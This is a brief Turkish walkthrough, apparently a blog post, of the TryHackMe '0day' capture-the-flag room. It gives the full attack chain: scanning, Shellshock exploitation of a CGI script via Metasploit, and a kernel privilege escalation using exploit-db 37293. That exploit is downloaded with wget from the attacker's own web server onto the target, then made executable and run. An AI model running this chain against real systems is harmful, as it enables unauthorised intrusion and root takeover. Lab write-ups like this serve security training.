Tryhackme 0day room türkçe

Fireintel
1 min readMar 30, 2022

--

Size, burada kolay ve kısa yolunu göstereceğim.

USER.TXT:

Keşif

önce nmap taraması yapıyoruz

nmap -sC -sV <host>

— — — — — — — —

daha sonra nikto ile web açık taraması yapıyoruz

nikto -h <host>

shellshock açığı olduğu görülür

__________________

gobuster dir -u http://<host>/cgi-bin -w /usr/share/wordlists/common.txt -x cgi yazarak siteyi tarıyoruz ve test.cgi’yi elde ediyoruz

Remote/Erişim

msfconsole yazarak metasploit framework’ü açıyoruz

daha sonra search shellshock yazarak exploitleri aratıyoruz

exploit/multi/http/apache_mod_cgi_bash_env_exec ‘i seçerek ayarları show options yapıp görüntüledikten sonra rhost, lhost ne varsa kendi hostlarınızı girin. Ardından TARGETURI’yı /cgi-bin/test.cgi girin

ardından exploit yazarak sistemi ele geçirin

shell komutunu kullanıp shell’e bağlanın

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’ komutuyla etkileşimli shell’e geçiyoruz

cd /home/ryan dizinine girip user flag’i alabilirsiniz :) (cat user.txt)

ROOT.TXT:

privesc

uname -a yazarak sürümü öğrendik ve exploit-db’den exploit arattık ve 37293 numaralı exploite ulaştık, indirip gcc ile execute ettik

python3 -m http.server yazdık ve wget komutuyla indirttik exploitimizi

daha sonra chmod 777 yetkisini veriyoruz dosyaya

./<exploit-dosyan> yazıp çalıştırıyoruz ve root oluyoruz

cd /root yazıp erişebilirsiniz root flag’e

--

--

Fireintel
Fireintel

Written by Fireintel

Cyber Security, Intelligence Analysis, Psychology, Medicine, Geography, Education

No responses yet